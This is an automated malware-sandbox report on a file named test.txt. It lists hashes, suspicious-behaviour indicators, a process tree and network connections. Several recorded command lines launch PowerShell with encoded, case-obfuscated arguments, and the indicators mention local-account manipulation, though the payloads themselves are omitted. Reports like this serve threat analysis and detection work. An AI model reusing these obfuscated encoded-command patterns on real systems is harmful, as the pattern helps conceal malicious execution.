File name: test.txt

Full analysis: https://app.any.run/tasks/303d8b3e-250d-4be1-bb4e-724fe6fd9a84
Verdict: Malicious activity
Analysis date: February 27, 2024, 16:50:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (4186), with no line terminators
MD5: 70EC42C70721DFA5577A11231FC66D8B
SHA1: 218F3D09B1CD3CA89DEBA42006F1B840C43EE5D0
SHA256: 5A64C36ABE98FAB7FC3D1BD5CE9DA771F4D9ED6CFE898905CF20ADF9534358A8
SSDEEP: 96:s3NVEjhK54KWgV5jBzXGqbCZ6jV0RNpmZZzZjedra4/:s3zMhK5XWSBDGqWZ6B0R7YZodO+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the Internet Settings

      • notepad.exe (PID: 3672)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2468)
      • powershell.exe (PID: 2560)
      • powershell.exe (PID: 1772)
      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 3508)
    • Starts CMD.EXE for commands execution

      • pwsh.exe (PID: 2208)
    • Starts POWERSHELL.EXE for commands execution

      • pwsh.exe (PID: 2208)
      • powershell.exe (PID: 2560)
      • cmd.exe (PID: 1236)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1772)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 2468)
      • powershell.exe (PID: 3172)
      • powershell.exe (PID: 3508)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2560)
      • pwsh.exe (PID: 2208)
      • cmd.exe (PID: 1236)
    • Application launched itself

      • powershell.exe (PID: 2560)
    • Reads the date of Windows installation

      • pwsh.exe (PID: 2208)
  • INFO

    • Manual execution by a user

      • pwsh.exe (PID: 2208)
      • explorer.exe (PID: 3652)
    • Reads the computer name

      • pwsh.exe (PID: 2208)
    • Checks supported languages

      • pwsh.exe (PID: 2208)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2560)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2560)
    • Create files in a temporary directory

      • powershell.exe (PID: 2560)
    • Reads the software policy settings

      • powershell.exe (PID: 2560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 48
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 1


Process information

PID
CMD
Path
Indicators
Parent process
PID: 1236 | CMD: "C:\Windows\system32\cmd.exe" | Path: C:\Windows\System32\cmd.exe | Parent process: pwsh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1772 | CMD: powershell -enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2208 | CMD: "C:\Program Files\PowerShell\7\pwsh.exe" -WorkingDirectory ~ | Path: C:\Program Files\PowerShell\7\pwsh.exe | Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
pwsh
Exit code:
0
Version:
7.2.11.500
Modules
Images
c:\program files\powershell\7\pwsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
PID: 2468 | CMD: powershell -enc "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" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2560 | CMD: Powershell | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2900 | CMD: POwersheLL -ENCOD [base64-encoded command argument omitted] | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3172 | CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3508 | CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENCOD 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Parent process: pwsh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3652 | CMD: "C:\Windows\explorer.exe" | Path: C:\Windows\explorer.exe | Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 3672 | CMD: "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\AppData\Local\Temp\test.txt" | Path: C:\Windows\System32\notepad.exe | Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events: 23 417
Read events: 23 220
Write events: 193
Delete events: 4

Modification events

Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation: write
Name: NodeSlots
Value:
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation: write
Name: MRUListEx
Value:
02000000070000000100000006000000000000000B0000000C0000000D0000000A0000000900000008000000030000000500000004000000FFFFFFFF
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation: write
Name: TV_FolderType
Value:
{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation: write
Name: TV_TopViewID
Value:
{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation: write
Name: TV_TopViewVersion
Value:
0
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value:
en-US
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation: write
Name: Mode
Value:
4
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation: write
Name: LogicalViewMode
Value:
1
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation: write
Name: FFlags
Value:
Process: (3672) notepad.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation: write
Name: IconSize
Value:
16
Executable files: 0
Suspicious files: 11
Text files: 4
Unknown types: 8

Dropped files

PID
Process
Filename
Type
PID: 2208 | Process: pwsh.exe | Filename: C:\Users\admin\AppData\Local\Microsoft\PowerShell\7.2.11\update1_v7.4.1_2024-01-11
MD5:
SHA256:
PID: 2208 | Process: pwsh.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e1a648060a327b80.customDestinations-ms | Type: binary
MD5: A20A86C096ADCB3F2B94729E95AC8359
SHA256: 9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273
PID: 3508 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | Type: binary
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID: 2208 | Process: pwsh.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i4od31u0.2mc.psm1 | Type: text
MD5: 5CF4B3280603C6B6C9F36C169457C198
SHA256: 068E9DCCC9510F2AE9E4A8C46C14416638DFA16DA3188920D2E68B516831A15C
PID: 3508 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\xdzln1t5.gec.psm1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID: 2208 | Process: pwsh.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt | Type: text
MD5: 22B9F9ED8A80E2733A32B9558D4671D3
SHA256: 1291CD88E2A6356C5B3959C9F8132F07F781E715182DF192110589403F82E197
PID: 2208 | Process: pwsh.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IBQNMNMIZ7XJKWFJ3TU4.temp | Type: binary
MD5: A20A86C096ADCB3F2B94729E95AC8359
SHA256: 9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273
PID: 1772 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\fwj3aj1d.sp4.ps1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID: 2900 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\ksx5ihd3.i4z.psm1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID: 3508 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\xpo4w2cb.jrw.ps1 | Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 7
DNS requests: 3
Threats: 0

HTTP requests

No HTTP requests

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
PID: 4 | Process: System | IP: 192.168.100.255:138 | Reputation: whitelisted
PID: 4 | Process: System | IP: 192.168.100.255:137 | Reputation: whitelisted
PID: 1080 | Process: svchost.exe | IP: 224.0.0.252:5355 | Reputation: unknown
PID: 2208 | Process: pwsh.exe | IP: 23.38.74.58:443 | Domain: aka.ms | ASN: AKAMAI-AS | CN: DE | Reputation: unknown
PID: 2208 | Process: pwsh.exe | IP: 52.239.160.36:443 | Domain: pscoretestdata.blob.core.windows.net | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: US | Reputation: unknown
PID: 2208 | Process: pwsh.exe | IP: 20.50.88.245:443 | Domain: dc.services.visualstudio.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: NL | Reputation: unknown

DNS requests

Domain
IP
Reputation
Domain: aka.ms | IP: 23.38.74.58 | Reputation: whitelisted
Domain: pscoretestdata.blob.core.windows.net | IP: 52.239.160.36 | Reputation: unknown
Domain: dc.services.visualstudio.com | IP: 20.50.88.245 | Reputation: whitelisted

Threats

No threats detected
Process
Message
Process: pwsh.exe | Message: Profiler was prevented from loading notification profiler due to app settings. Process ID (decimal): 2208. Message ID: [0x2509].